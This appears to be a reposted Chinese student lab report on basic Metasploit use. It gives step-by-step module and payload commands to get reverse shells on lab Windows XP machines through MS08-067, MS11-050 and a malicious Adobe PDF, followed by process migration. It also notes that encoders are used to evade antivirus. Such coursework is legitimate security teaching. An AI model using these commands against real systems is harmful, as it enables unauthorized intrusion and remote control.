zoukankan      html  css  js  c++  java

  • 20145312《网络对抗》MSF基础

    20145312《网络对抗》MSF基础

    实验要求

    1.掌握metasploit的基本应用方式
    2.掌握常用的三种攻击方式的思路

    实验问答

    • 用自己的话解释什么是exploit、payload、encode
      exploit就相当于是一个运载的工具,将负责攻击的代码传送到靶机中。
      payload也就是负责攻击的代码
      encode也就是编码,它主要有两个功能,一是为了避免之前的payload中出现坏字符,二就是它要伪装从而实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。

    实践过程

    MS08_067漏洞渗透攻击实践

    • 实验准备:两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)
    • 在kali终端输入命令msfconsole进入msf控制台
    • 输入命令search ms08_067,找到的渗透模块,输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块控制模式,输入命令show payload会显示出有效的攻击载荷,我找到一个shell_reverse_tcp
    • 使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷,输入命令set RHOST 192.168.60.133 设置靶机IP地址, set RHOST 192.168.60.132设置本机IP地址,输入指令show options查看payload状态
    • 输入命令exploit开始攻击
    • 在kali上执行ipconfig/all
    • 在win xp上执行同样的命令,如下图所示

    MS08_067远程漏洞攻击实践:meterpreter

    • 输入指令use exploit/windows/smb/ms08_067_netapi,进入ms08_067漏洞模块,输入指令set payload windows/meterpreter/reverse_tcp设置payload,输入指令show options,查看payload状态
    • 成功攻击结果:

    MS11050安全漏洞

    • 输入命令use windows/browser/ms11_050_mshtml_cobjectelement,进入该漏洞模块,设置对应的载荷set payload windows/meterpreter/reverse_tcp,设置相关信息,输入指令exploit,有靶机需要访问的ip地址:http://192.168.60.132:8080/baidu
    • 输入命令sessions -i 1,开始连接,攻击成功,获取shell

    Adobe阅读器渗透攻击

    • 实验前准备:两台虚拟机,其中一台为kali,一台为windows xp sp3

    • 输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用,使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷,输入命令show options显示payload状态

    • 创建一个pdf文件,设置靶机和本机IP地址,并使用命令show options,看是否设置成功

    • 输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。使用use exploit/multi/handler新建一个监听模块,使用set payload windows/meterpreter/reverse_tcp建立一个反向连接,使用命令exploit开始攻击,在xp中打开pdf。这里pdf比较难打开,直接在kali中等结果就可以啦,如下图:

    • 将进程迁移到explorer.exe.使用ps查看当前进程,并找到explorer.exe的进程号,如下图所示,使用命令migrate 1928,输入shell,查看xp靶机信息。

    • 在靶机xp中使用命令netstat -an,看本地tcp连接

    MSF辅助模块应用

    • 先手动创建一个msf所需的数据库service postgresql startmsfdb start,开启msf

    • 输入指令search browser查找浏览器相关应用模块

    • 找到一条关于雅虎通服务端的应用模块(绝对原创,如有雷同,纯属巧合)

    • 进入该应用模块,show options查看需要输入的信息

    • 好的,并没有。exploit命令,打开服务,显示Local IP:http://192.168.169.128:8080/Uj75J3FR 打开浏览器输入该地址。

    • kali终端会显示一条发送请求至雅虎通的信息。刷新一次,请求一次。

    实验体会

    • 前几次实验已经接触过了metasploit监听模块的使用,已然感受到它的功能强大。通过这次ms08_067、ms11_05、Adobe以及辅助模块的实践,对它有了更深刻的认识。也知道了漏洞的存在使我们的操作系统变得很不安全,所以及时更新应用,更新补丁是必要的。
  • 相关阅读:
    C# Dictionary几种遍历方式
    Android 代码中文字在手机上显示乱码问题解决方法
    【Android学习5】Clean 之后R文件丢失
    【android学习4】Eclipse中Clean作用
    Java基础语法(练习)
    Java基础语法(自定义类、ArrayList集合)
    Java基础语法(方法)
    Java基础语法(数组)
    Java基础(Scanner、Random、流程控制语句)
    Java基础(变量、运算符)
  • 原文地址:https://www.cnblogs.com/yx20145312/p/6719565.html
Copyright © 2011-2022 走看看